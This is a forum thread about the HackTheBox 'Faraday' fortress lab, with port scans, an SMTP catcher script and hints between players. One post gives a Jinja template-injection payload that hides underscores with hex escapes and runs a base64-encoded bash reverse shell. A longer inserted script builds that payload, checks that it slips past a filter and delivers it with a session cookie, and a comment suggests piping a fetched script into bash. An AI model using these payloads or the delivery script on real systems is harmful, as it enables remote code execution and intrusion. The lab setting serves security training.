Faraday fortress
Hi guys,
Does anyone have anything useful regarding this fortress? Totally stuck.
Reply
# HTB Fortress
## Faraday
### Entrance 10.13.37.14
```
└─$ ping 10.13.37.14               
PING 10.13.37.14 (10.13.37.14) 56(84) bytes of data.
64 bytes from 10.13.37.14: icmp_seq=1 ttl=63 time=76.2 ms
```
## Basic Nmap scan
```bash
$nmap -v 10.13.37.14
Nmap scan report for 10.13.37.14
Host is up (0.082s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
8888/tcp open  sun-answerbook
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.75 seconds
```
## Port 8888
```bash
└─$ nc -nv 10.13.37.14 8888                                                 
(UNKNOWN) [10.13.37.14] 8888 (?) open
Welcome to FaradaySEC stats!!!
Username: root
Password: root
access denied!!!
```
## Port 22
```
└─$ nc -nv 10.13.37.14 22                         
(UNKNOWN) [10.13.37.14] 22 (ssh) open
SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.2
```
## Port 80

Creating a login for the Alert system


The server isn't configured yet. We can create an SMTP server with Python to see if it connects. Putting in some bogus info for now.
Getting past the config, we start to get some information about the computers and users:


We can start to collect this information for wordlists.


It looks like the site is set up to send alerts through SMTP, so we can set up an SMTP server and save any emails we get to a file.
https://stackoverflow.com/questions/2690965/a-simple-smtp-server-in-python
```python
from datetime import datetime
import asyncore
from smtpd import SMTPServer  # smtpd and asyncore were removed in Python 3.12; run this on 3.11 or older


class EmlServer(SMTPServer):
    """Catch-all SMTP sink: every message it receives is written to a .eml file."""
    no = 0

    def process_message(self, peer, mailfrom, rcpttos, data, **kwargs):
        # data is bytes (smtpd's default decode_data=False), hence binary mode
        filename = '%s-%d.eml' % (datetime.now().strftime('%Y%m%d%H%M%S'),
            self.no)
        print(filename)
        with open(filename, 'wb') as f:  # original used f.close without (), which never closed the file
            f.write(data)
        print('%s saved.' % filename)
        self.no += 1


def run():
    # Bind all interfaces, not localhost, or the target can never reach us; port 25 needs root
    EmlServer(('0.0.0.0', 25), None)
    try:
        asyncore.loop()
    except KeyboardInterrupt:
        pass


if __name__ == '__main__':
    run()
```
Once our server is up we can try and get the web app to send us an email.


Back on our machine, we can see that we have an email saved to a file and get the first flag.

```bash
┌──(kali㉿kali)-[~/htb/Fortress-Machines/Faraday/smtpServer]
└─$ ls                                                                           
20211212170740-0.eml  smtpserver.py   
┌──(kali㉿kali)-[~/htb/Fortress-Machines/Faraday/smtpServer]
└─$ cat 20211212170740-0.eml         
Subject: asdf
An event was reported at JohnConnor:
asdf
Here is your gift FARADAY{REDACTED}
```
Reply
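The smtpd/asyncore modules the script above imports were removed from Python in 3.12, so here is the same catch-all mail sink on asyncio. This is an added example, not code from the writeup or from Faraday: it implements just enough of the SMTP server side (greeting, HELO/EHLO, MAIL, RCPT, DATA with dot-unstuffing, QUIT) for a sender such as the alert system to hand over a message, and saves each one as a timestamped .eml exactly like the original. The SAMPLE_EXCHANGE transcript is constructed, not captured from the target, so the parser can be exercised offline.

```python
import asyncio
import sys
from datetime import datetime
from pathlib import Path


def _address(arg: bytes) -> str:
    """'FROM:<a@b>' / 'TO: <a@b> SIZE=1' -> 'a@b' (ESMTP parameters ignored)."""
    _, _, rest = arg.partition(b":")
    tokens = rest.split()
    return (tokens[0].strip(b"<>") if tokens else b"").decode("utf-8", "replace")


class SmtpSession:
    """Minimal RFC 5321 server-side state machine: one session, any number of messages."""

    def __init__(self):
        self.mailfrom = None
        self.rcpttos = []
        self.in_data = False
        self._lines = []
        self.messages = []  # (mailfrom, rcpttos, raw message bytes with CRLF line ends)

    def greeting(self) -> bytes:
        return b"220 catcher ESMTP ready\r\n"

    def feed(self, line: bytes) -> bytes:
        """Consume one client line (CRLF stripped); return the reply, or b'' while inside DATA."""
        if self.in_data:
            if line == b".":
                # end of message: undo dot-stuffing (RFC 5321 4.5.2) and store the body
                body = b"\r\n".join(l[1:] if l.startswith(b".") else l for l in self._lines)
                self.messages.append((self.mailfrom, list(self.rcpttos), body + b"\r\n"))
                self.mailfrom, self.rcpttos, self._lines, self.in_data = None, [], [], False
                return b"250 OK: queued\r\n"
            self._lines.append(line)
            return b""
        verb, _, arg = line.partition(b" ")
        verb = verb.upper()
        if verb in (b"HELO", b"EHLO"):
            return b"250 catcher\r\n"  # single-line reply: no extensions advertised
        if verb == b"MAIL":
            self.mailfrom = _address(arg)
            return b"250 OK\r\n"
        if verb == b"RCPT":
            self.rcpttos.append(_address(arg))
            return b"250 OK\r\n"
        if verb == b"DATA":
            if self.mailfrom is None or not self.rcpttos:
                return b"503 Bad sequence of commands\r\n"
            self.in_data = True
            return b"354 End data with <CR><LF>.<CR><LF>\r\n"
        if verb == b"RSET":
            self.mailfrom, self.rcpttos = None, []
            return b"250 OK\r\n"
        if verb == b"NOOP":
            return b"250 OK\r\n"
        if verb == b"QUIT":
            return b"221 Bye\r\n"
        return b"500 Command not recognized\r\n"


def capture_exchange(client_lines):
    """Replay a scripted client session offline; returns (server replies, captured messages)."""
    session = SmtpSession()
    replies = [session.greeting()]
    for line in client_lines:
        reply = session.feed(line)
        if reply:
            replies.append(reply)
    return replies, session.messages


def save_messages(messages, outdir="."):
    """Write each message to <timestamp>-<n>.eml, as the smtpd version does; returns the paths."""
    paths = []
    for n, (mailfrom, rcpttos, body) in enumerate(messages):
        path = Path(outdir) / f"{datetime.now():%Y%m%d%H%M%S}-{n}.eml"
        path.write_bytes(body)
        print(f"{path} saved (from {mailfrom} to {', '.join(rcpttos)})")
        paths.append(path)
    return paths


async def _handle(reader, writer, outdir):
    session = SmtpSession()
    writer.write(session.greeting())
    await writer.drain()
    while True:
        raw = await reader.readline()
        if not raw:  # client went away
            break
        reply = session.feed(raw.rstrip(b"\r\n"))
        if reply:
            writer.write(reply)
            await writer.drain()
            if reply.startswith(b"221"):
                break
    save_messages(session.messages, outdir)
    writer.close()


async def serve(host="0.0.0.0", port=25, outdir="."):
    """Listen on every interface so the target can connect (port 25 needs root or CAP_NET_BIND_SERVICE)."""
    server = await asyncio.start_server(lambda r, w: _handle(r, w, outdir), host, port)
    async with server:
        await server.serve_forever()


# Constructed sample session (not captured from Faraday) for exercising the parser offline.
SAMPLE_EXCHANGE = [
    b"EHLO alerts.faraday.local",
    b"MAIL FROM:<alerts@faraday.local>",
    b"RCPT TO:<me@attacker.local>",
    b"DATA",
    b"Subject: asdf",
    b"",
    b"An event was reported at JohnConnor:",
    b"..this line started with a dot on the wire",
    b".",
    b"QUIT",
]

if __name__ == "__main__":
    asyncio.run(serve(port=int(sys.argv[1]) if len(sys.argv) > 1 else 25))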
Can anybody give some nudges for the following flags:
- Time to play
- Careful read
- Rootkit

The rest, I got it.
Reply
(August 1, 2022, 10:51 PM)farkow Wrote: Can anybody give some nudges for the following flags:
- Time to play
- Careful read
- Rootkit

The rest, I got it.


Do you have any hint on flag 2 (let's count)?
Found the source code and tried some SSTI in many places but without any success. The "console.log" from the source isn't really helping either :)
Reply
(August 2, 2022, 08:50 PM)ThatUsername Wrote:
(August 1, 2022, 10:51 PM)farkow Wrote: Can anybody give some nudges for the following flags:
- Time to play
- Careful read
- Rootkit

The rest, I got it.


Do you have any hint on flag 2 (let's count)?
Found the source code and tried some SSTI in many places but without any success. The "console.log" from the source isn't really helping either :)


You are on the right track! SSTI is the way to go.
I am sure you were trying to inject code in the profile endpoint.
However, you need to escape it. {{ is not going to work. It is not complex; get a hint from the HackTricks website.
To be on the safe side, put your reverse shell script on your server and serve it, and curl the file in your injection.
Of course, you are going to need your session in cookies, too.
After the payload is delivered, send a POST request to the message endpoint.
Prepare a Python or Go script that sends a payload to the profile page.
And enjoy your reverse shell for the next steps.
Reply
For flag 2 use this payload:

```
{% with a = request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("echo -n YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40LzkwMDEgMD4mMQ== | base64 -d | bash")["read"]() %} a {% endwith %}
```

Change the base64 payload to use your IP.
Reply
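The two posts above (the hint to escape `{{` and send the payload to the profile endpoint with your session cookie, then POST to the message endpoint; and the concrete `{% with %}` payload) fit in one small script. This is an added example, not code from the thread or from Faraday: it generates the payload in the exact form posted above, checks that neither `{{` nor a literal `__` appears in it, and delivers it with only the Python standard library. The endpoint paths `/profile` and `/message`, the form field `bio`, the cookie name `session` and the base URL are assumptions, since the thread names only a "profile endpoint" and a "message endpoint"; the reverse-shell command and the base64 trick come from the posted payload, and the commented `curl` line is the "host the script on your server" variant the hint recommends.

```python
import argparse
import base64
import urllib.parse
import urllib.request

# "__" is spelled with hex escapes inside the Jinja string literals, as in the payload posted
# in the thread, so a filter looking for "__" sees nothing; "{% with %}" is a statement block,
# so a filter looking for "{{" sees nothing either.
DUNDER = r"\x5f\x5f"
BLOCKED = ("{{", "__")


def reverse_shell_b64(lhost: str, lport: int) -> str:
    """Base64 of the bash reverse shell one-liner (no trailing newline, hence the echo -n on the page)."""
    cmd = f"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"
    return base64.b64encode(cmd.encode()).decode()


def ssti_payload(command: str) -> str:
    """Wrap an arbitrary shell command in the {% with %} form from the thread: os is reached via
    request.application.__globals__.__builtins__.__import__ with every dunder hex-escaped."""
    if '"' in command:
        raise ValueError("command is embedded in a Jinja string literal; double quotes would break it")
    imp = (f'request["application"]["{DUNDER}globals{DUNDER}"]'
           f'["{DUNDER}builtins{DUNDER}"]["{DUNDER}import{DUNDER}"]("os")')
    return f'{{% with a = {imp}["popen"]("{command}")["read"]() %}} a {{% endwith %}}'


def passes_filter(payload: str) -> bool:
    """True when none of the substrings a naive template-injection filter rejects is present."""
    return not any(tok in payload for tok in BLOCKED)


def deliver(base_url, session_cookie, payload, field="bio",
            profile_path="/profile", message_path="/message", cookie_name="session"):
    """POST the payload into a profile field with the user's session cookie, then POST to the
    message endpoint so the app renders it. Paths, field name and cookie name are assumptions."""
    opener = urllib.request.build_opener()
    opener.addheaders = [("Cookie", f"{cookie_name}={session_cookie}")]
    form = urllib.parse.urlencode({field: payload}).encode()
    with opener.open(base_url + profile_path, data=form, timeout=10) as resp:
        profile_status = resp.status
    with opener.open(base_url + message_path, data=b"", timeout=10) as resp:  # empty-body POST
        message_status = resp.status
    return profile_status, message_status


if __name__ == "__main__":
    ap = argparse.ArgumentParser(description="build (and optionally send) the Faraday SSTI payload")
    ap.add_argument("lhost", help="your tun0 address")
    ap.add_argument("lport", type=int, help="port your listener is on")
    ap.add_argument("--url", help="target base URL, e.g. http://10.13.37.14 (sends only when given)")
    ap.add_argument("--cookie", help="value of your session cookie")
    args = ap.parse_args()
    # Alternative, as the hint suggests: serve the shell script yourself and fetch it instead:
    # shell_cmd = f"curl http://{args.lhost}/shell.sh | bash"
    shell_cmd = f"echo -n {reverse_shell_b64(args.lhost, args.lport)} | base64 -d | bash"
    payload = ssti_payload(shell_cmd)
    assert passes_filter(payload)
    print(payload)
    if args.url and args.cookie:
        print(deliver(args.url, args.cookie, payload))
```

Start `nc -lvnp 9001` first, then run the script with your tun0 address; with `10.10.14.4 9001` it reproduces the payload posted above byte for byte.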
(August 1, 2022, 10:51 PM)farkow Wrote: Can anybody give some nudges for the following flags:
- Time to play
- Careful read
- Rootkit

The rest, I got it.


Hey, how did you bypass ninvaders?
Reply
(August 1, 2022, 10:51 PM)farkow Wrote: Can anybody give some nudges for the following flags:
- Time to play
- Careful read
- Rootkit

The rest, I got it.


Can you share?
Reply
So far, I got 4 flags.
- Port 80: set up an SMTP receiver
- Port 80: .git + SSTI
# intermediate step
- Read out /app/db/database.db. It contains 3 valid SSH logins.
- Read /var/mail/administrator, decode access.log
Not sure if this was intended, but I used a polkit PE exploit. Perhaps port 8888 is the intended way.
# Some ideas what to do next
- /usr/games/ninvaders
- /home/pasta/crackme
- Port 8888
- Rootkit?
@farkow Can give you hints regarding Time to play + Rootkit?
Reply